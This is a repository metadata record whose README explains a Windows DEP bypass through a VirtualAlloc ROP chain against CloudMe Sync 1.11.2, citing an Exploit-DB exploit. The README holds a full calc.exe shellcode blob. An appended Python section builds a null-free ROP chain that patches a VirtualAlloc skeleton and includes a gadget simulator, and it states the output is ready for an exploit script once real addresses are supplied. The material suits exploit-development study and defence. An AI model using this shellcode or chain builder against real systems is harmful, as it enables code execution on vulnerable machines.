{"id":27462134,"url":"https://github.com/x86byte/ropme","last_synced_at":"2025-04-15T21:51:24.478Z","repository":{"id":255943133,"uuid":"850794902","full_name":"x86byte/ROPme","owner":"x86byte","description":"Windows Exploit development : Bypass Data Execution Prevention (DEP) using ROP chains manually hard code","archived":false,"fork":false,"pushed_at":"2024-09-05T05:06:09.000Z","size":1182,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-29T01:51:42.854Z","etag":null,"topics":["exploit-development","return-oriented-programming","user-mode","windows-exploitation"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/x86byte.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-01T19:48:51.000Z","updated_at":"2024-11-30T11:07:29.000Z","dependencies_parsed_at":"2024-09-08T02:51:14.962Z","dependency_job_id":"cae8e7df-bcac-4d6b-8b73-6e3f3f13592f","html_url":"https://github.com/x86byte/ROPme","commit_stats":null,"previous_names":["onomatopwn/ropme","ring0-c0d3-br34k3r/ropme","x86byte/ropme"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/x86byte%2FROPme","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/x86byte%2FROPme/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/x86byte%2FROPme/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories
/x86byte%2FROPme/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/x86byte","download_url":"https://codeload.github.com/x86byte/ROPme/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249161104,"owners_count":21222468,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit-development","return-oriented-programming","user-mode","windows-exploitation"],"created_at":"2025-04-15T21:51:23.837Z","updated_at":"2025-04-15T21:51:24.472Z","avatar_url":"https://github.com/x86byte.png","language":"Python","readme":"# ROPme\nBypassing Data Execution Prevention (DEP) with VirtualAlloc from a ROP (Return-Oriented Programming) chain is a common technique. DEP marks the stack and heap non-executable, so the overflow cannot simply jump into shellcode placed there. Instead, a sequence of gadgets (short instruction sequences ending in a return, borrowed from modules already loaded in the process) is used to set up a call to VirtualAlloc or a similar function and allocate memory with PAGE_EXECUTE_READWRITE permissions. 
This allocated memory can then be used to execute the shellcode: in the usual layout the return address placed under the VirtualAlloc call points at the shellcode, so execution continues there once the memory is executable.\n\n![image](https://github.com/user-attachments/assets/ba318158-d6c6-462b-94a8-83b803af2827)\n\n## Starting point\nThe work starts from the public [CloudMe Sync exploit on Exploit-DB](https://www.exploit-db.com/exploits/46250) and targets the vulnerable [CloudMe Sync 1.11.2](https://www.exploit-db.com/apps/f0534b12cd51fefd44002862918801ab-CloudMe_1112.exe) build.\n\n## Tools used\n- [WinDbg](https://learn.microsoft.com/en-gb/windows-hardware/drivers/debugger)\n- [Immunity Debugger](https://debugger.immunityinc.com/)\n- IDA Pro\n- Sublime Text\n- IDLE (Python)\n- the [VirtualAlloc](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) function (memoryapi.h)\n- and finally the calc.exe shellcode used as the payload:\n\n```python\n# Shellcode calc.exe\nshellcode = \"\"\nshellcode += \"\\xdb\\xde\\xd9\\x74\\x24\\xf4\\x58\\x2b\\xc9\\xb1\\x31\\xba\\xef\"\nshellcode += \"\\xc3\\xbd\\x59\\x83\\xc0\\x04\\x31\\x50\\x14\\x03\\x50\\xfb\\x21\"\nshellcode += \"\\x48\\xa5\\xeb\\x24\\xb3\\x56\\xeb\\x48\\x3d\\xb3\\xda\\x48\\x59\"\nshellcode += \"\\xb7\\x4c\\x79\\x29\\x95\\x60\\xf2\\x7f\\x0e\\xf3\\x76\\xa8\\x21\"\nshellcode += \"\\xb4\\x3d\\x8e\\x0c\\x45\\x6d\\xf2\\x0f\\xc5\\x6c\\x27\\xf0\\xf4\"\nshellcode += \"\\xbe\\x3a\\xf1\\x31\\xa2\\xb7\\xa3\\xea\\xa8\\x6a\\x54\\x9f\\xe5\"\nshellcode += \"\\xb6\\xdf\\xd3\\xe8\\xbe\\x3c\\xa3\\x0b\\xee\\x92\\xb8\\x55\\x30\"\nshellcode += \"\\x14\\x6d\\xee\\x79\\x0e\\x72\\xcb\\x30\\xa5\\x40\\xa7\\xc2\\x6f\"\nshellcode += \"\\x99\\x48\\x68\\x4e\\x16\\xbb\\x70\\x96\\x90\\x24\\x07\\xee\\xe3\"\nshellcode += \"\\xd9\\x10\\x35\\x9e\\x05\\x94\\xae\\x38\\xcd\\x0e\\x0b\\xb9\\x02\"\nshellcode += \"\\xc8\\xd8\\xb5\\xef\\x9e\\x87\\xd9\\xee\\x73\\xbc\\xe5\\x7b\\x72\"\nshellcode += \"\\x13\\x6c\\x3f\\x51\\xb7\\x35\\x9b\\xf8\\xee\\x93\\x4a\\x04\\xf0\"\nshellcode += \"\\x7c\\x32\\xa0\\x7a\\x90\\x27\\xd9\\x20\\xfe\\xb6\\x6f\\x5f\\x4c\"\nshellcode += \"\\xb8\\x6f\\x60\\xe0\\xd1\\x5e\\xeb\\x6f\\xa5\\x5e\\x3e\\xd4\\x59\"\nshellcode 
+= \"\\x15\\x63\\x7c\\xf2\\xf0\\xf1\\x3d\\x9f\\x02\\x2c\\x01\\xa6\\x80\"\nshellcode += \"\\xc5\\xf9\\x5d\\x98\\xaf\\xfc\\x1a\\x1e\\x43\\x8c\\x33\\xcb\\x63\"\nshellcode += \"\\x23\\x33\\xde\\x07\\xa2\\xa7\\x82\\xe9\\x41\\x40\\x20\\xf6\"\n```\n\n# Demo\n### [YouTube video](https://www.youtube.com/watch?v=Jmxx7TdAzgw)\n\n# References\n- [CS6265: Reverse Engineering and Binary Exploitation Lab](https://tc.gts3.org/cs6265/2021/_static/tut.pdf)\n- [Connor McGarr. Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!](https://connormcgarr.github.io/ROP/)\n- [Beenu Arora. Shell code for beginners](https://www.exploit-db.com/docs/english/13019-shell-code-for-beginners.pdf)\n- [Exploit-DB, Ashfaq Ansari. Egg-hunter, a twist in buffer overflows](https://www.exploit-db.com/docs/english/18482-egg-hunter---a-twist-in-buffer-overflow.pdf)\n- [Exploit-DB, John Leitch. Windows/x86 (XP SP3) (English) calc.exe shellcode (16 bytes)](https://www.exploit-db.com/shellcodes/43773)\n- [NIST National Vulnerability Database. Most recent vulnerabilities in VLC media player](https://nvd.nist.gov/vuln/search/results?form_type=Basic\u0026results_type=overview\u0026query=vlc\u0026search_type=all)\n- [Security StackExchange. What does EIP stand for?](https://security.stackexchange.com/questions/129499/what-does-eip-stand-for)\n- [Stack Overflow. What and where are the stack and heap?](https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap)\n- [Stack Overflow. What are the ESP and EBP registers?](https://stackoverflow.com/questions/21718397/what-are-the-esp-and-the-ebp-registers)\n- [Stack Overflow. What is a reverse shell?](https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell)\n- [Microsoft Support. 
What is a DLL?](https://support.microsoft.com/en-us/help/815065/what-is-a-dll)\n\n### What are mitigations?\n- Over the years, generic defense mechanisms such as DEP have been added to operating systems. As the name implies, a mitigation does not prevent exploitation outright; it makes exploitation harder, so that an attacker needs something extra (here, a ROP chain that calls VirtualAlloc) to get shellcode running. Microsoft documents how these protections are configured on Windows in \"[Customize exploit protection](https://learn.microsoft.com/en-us/defender-endpoint/customize-exploit-protection)\".\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fx86byte%2Fropme","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fx86byte%2Fropme","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fx86byte%2Fropme/lists"}
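The VirtualAlloc DEP bypass that the README above describes, worked through as an added example. This is not code from the ROPme repository or its author and it does not reproduce the CloudMe exploit. It builds the classic ESP-relative layout for a 32-bit stack overflow: a six-dword VirtualAlloc "skeleton" (function pointer, return address, lpAddress, dwSize, flAllocationType, flProtect) is placed right after the gadget chain; the chain locates it with `push esp ; pop ebx`, patches each slot through `mov [ebx], eax`, and then simply returns into it, so VirtualAlloc returns straight into the shellcode that follows the skeleton. It goes a little beyond the page's hard-coded values by encoding every constant so that the chain contains no null byte: a value is loaded as-is, as a two's-complement value undone by `neg`, or as two null-free addends. All addresses (stack pointer, IAT slot, the ten gadgets) are invented for the illustration and marked as assumed in the code; a real chain takes them from the target's non-ASLR modules and uses the bad-character set of the actual input path. The small simulator at the end models only those ten gadgets and exists to check the stack frame the chain produces.

```python
# Added example, not ROPme code: ESP-relative VirtualAlloc "skeleton" ROP chain plus a tiny gadget simulator.
import struct

M = 0xFFFFFFFF
PAGE_EXECUTE_READWRITE, MEM_COMMIT = 0x40, 0x1000
BAD_CHARS = b"\x00"                     # assumed: the target only rejects null bytes
STACK_BASE = 0x0028F6B0                 # assumed ESP right after the overwritten return address
VA_IAT, VA_FN = 0x6E110210, 0x75E1A3C0  # assumed IAT slot holding &VirtualAlloc, and its run-time value
G_ESP_TO_EBX = 0x6E1121A2               # push esp ; pop ebx ; ret      (all gadget addresses assumed, null-free)
G_POP_ECX = 0x6E1132B4                  # pop ecx ; ret
G_NEG_ECX = 0x6E1143C6                  # neg ecx ; ret
G_ADD_EBX_ECX = 0x6E1154D8              # add ebx, ecx ; ret
G_POP_EAX = 0x6E1165EA                  # pop eax ; ret
G_NEG_EAX = 0x6E1176FC                  # neg eax ; ret
G_DEREF_EAX = 0x6E11871E                # mov eax, [eax] ; ret
G_EBX_TO_EAX = 0x6E119822               # push ebx ; pop eax ; ret
G_ADD_EAX_ECX = 0x6E11A934              # add eax, ecx ; ret
G_STORE = 0x6E11BA46                    # mov [ebx], eax ; ret

def p32(v):
    return struct.pack("<I", v & M)

def neg32(v):                           # two's complement: the dword that NEG turns back into v
    return (-v) & M

def has_bad(data):
    return any(b in data for b in BAD_CHARS)

def load_eax(value):
    """Gadgets that leave `value` in EAX with no bad chars in the chain: as-is, via NEG, or as two addends."""
    if not has_bad(p32(value)):
        return [G_POP_EAX, value]
    if not has_bad(p32(neg32(value))):               # 0x40 -> pop 0xFFFFFFC0 ; neg eax
        return [G_POP_EAX, neg32(value), G_NEG_EAX]
    for a in range(0x11111111, M, 0x11111111):       # 0x1000 -> 0x11111111 + 0xEEEEFEEF
        if not has_bad(p32(a)) and not has_bad(p32(value - a)):
            return [G_POP_EAX, a, G_POP_ECX, (value - a) & M, G_ADD_EAX_ECX]
    raise ValueError("cannot encode 0x%08x" % value)

ADVANCE = [G_POP_ECX, neg32(4), G_NEG_ECX, G_ADD_EBX_ECX]   # ebx += 4: move to the next skeleton slot

def build_chain(skel_off):
    """Patch a 6-dword VirtualAlloc skeleton lying skel_off bytes past &chain[1], then fall into it."""
    c = [G_ESP_TO_EBX, G_POP_ECX, neg32(skel_off), G_NEG_ECX, G_ADD_EBX_ECX]   # ebx = &skeleton[0]
    c += load_eax(VA_IAT) + [G_DEREF_EAX, G_STORE] + ADVANCE                  # [0] &VirtualAlloc, read via IAT
    c += [G_EBX_TO_EAX, G_POP_ECX, neg32(20), G_NEG_ECX, G_ADD_EAX_ECX, G_STORE] + ADVANCE  # [1] ret = &skel[6]
    c += [G_EBX_TO_EAX, G_POP_ECX, neg32(16), G_NEG_ECX, G_ADD_EAX_ECX, G_STORE] + ADVANCE  # [2] lpAddress = same
    c += load_eax(0x1000) + [G_STORE] + ADVANCE                               # [3] dwSize
    c += load_eax(MEM_COMMIT) + [G_STORE] + ADVANCE                           # [4] flAllocationType
    c += load_eax(PAGE_EXECUTE_READWRITE) + [G_STORE]                         # [5] flProtect; next RET pops [0]
    return c

def build_payload(shellcode):
    n = len(build_chain(0))                          # chain length does not depend on skel_off
    rop = b"".join(p32(x) for x in build_chain((n - 1) * 4)) + p32(0x41414141) * 6   # + skeleton placeholders
    if has_bad(rop):
        raise ValueError("bad char in chain")
    return rop + shellcode                           # the shellcode sits right after the skeleton

class Sim:                                           # just enough x86 to run the ten gadgets above
    def __init__(self, payload):                     # the fake stack is the payload itself
        self.stack, self.esp = bytearray(payload), STACK_BASE
        self.eax = self.ebx = self.ecx = 0
        self.mem = {VA_IAT: VA_FN}                   # the only non-stack memory the chain reads
    def rd(self, addr):
        if addr in self.mem:
            return self.mem[addr]
        return struct.unpack_from("<I", self.stack, addr - STACK_BASE)[0]
    def pop(self):
        v, self.esp = self.rd(self.esp), self.esp + 4
        return v
    def step(self, eip):
        ops = {
            G_ESP_TO_EBX: lambda: setattr(self, "ebx", self.esp),
            G_POP_ECX: lambda: setattr(self, "ecx", self.pop()),
            G_NEG_ECX: lambda: setattr(self, "ecx", neg32(self.ecx)),
            G_ADD_EBX_ECX: lambda: setattr(self, "ebx", (self.ebx + self.ecx) & M),
            G_POP_EAX: lambda: setattr(self, "eax", self.pop()),
            G_NEG_EAX: lambda: setattr(self, "eax", neg32(self.eax)),
            G_DEREF_EAX: lambda: setattr(self, "eax", self.rd(self.eax)),
            G_EBX_TO_EAX: lambda: setattr(self, "eax", self.ebx),
            G_ADD_EAX_ECX: lambda: setattr(self, "eax", (self.eax + self.ecx) & M),
            G_STORE: lambda: struct.pack_into("<I", self.stack, self.ebx - STACK_BASE, self.eax),
        }
        ops[eip]()                                   # KeyError here: the chain returned into a non-gadget
    def run(self):
        while True:
            eip = self.pop()
            if eip == VA_FN:                         # reached skeleton[0]: VirtualAlloc is being "called"
                names = ("ret", "lpAddress", "dwSize", "flAllocationType", "flProtect")
                return {n: self.rd(self.esp + 4 * i) for i, n in enumerate(names)}
            self.step(eip)

def demo(shellcode=b"\xcc" * 16):                    # stand-in bytes, not the page's calc.exe shellcode
    sim = Sim(build_payload(shellcode))
    frame = sim.run()
    at = frame["lpAddress"] - STACK_BASE             # check that lpAddress really points at the shellcode
    frame["shellcode_ok"] = bytes(sim.stack[at:at + len(shellcode)]) == shellcode
    return frame
```

Calling `demo()` returns the frame VirtualAlloc would see: flProtect 0x40, flAllocationType and dwSize 0x1000, and a return address equal to lpAddress, both pointing at the bytes placed after the skeleton. The skeleton offset is computed in two passes because the chain's length does not depend on it; the `neg` trick keeps small offsets such as 4, 16 or 20 out of the bad-character set, and the two-addend path covers values like 0x1000 whose negation still contains a null. With real gadget addresses from the target's modules and the application's actual bad characters, `build_payload` emits the byte string that an exploit script would place where the page's shellcode goes.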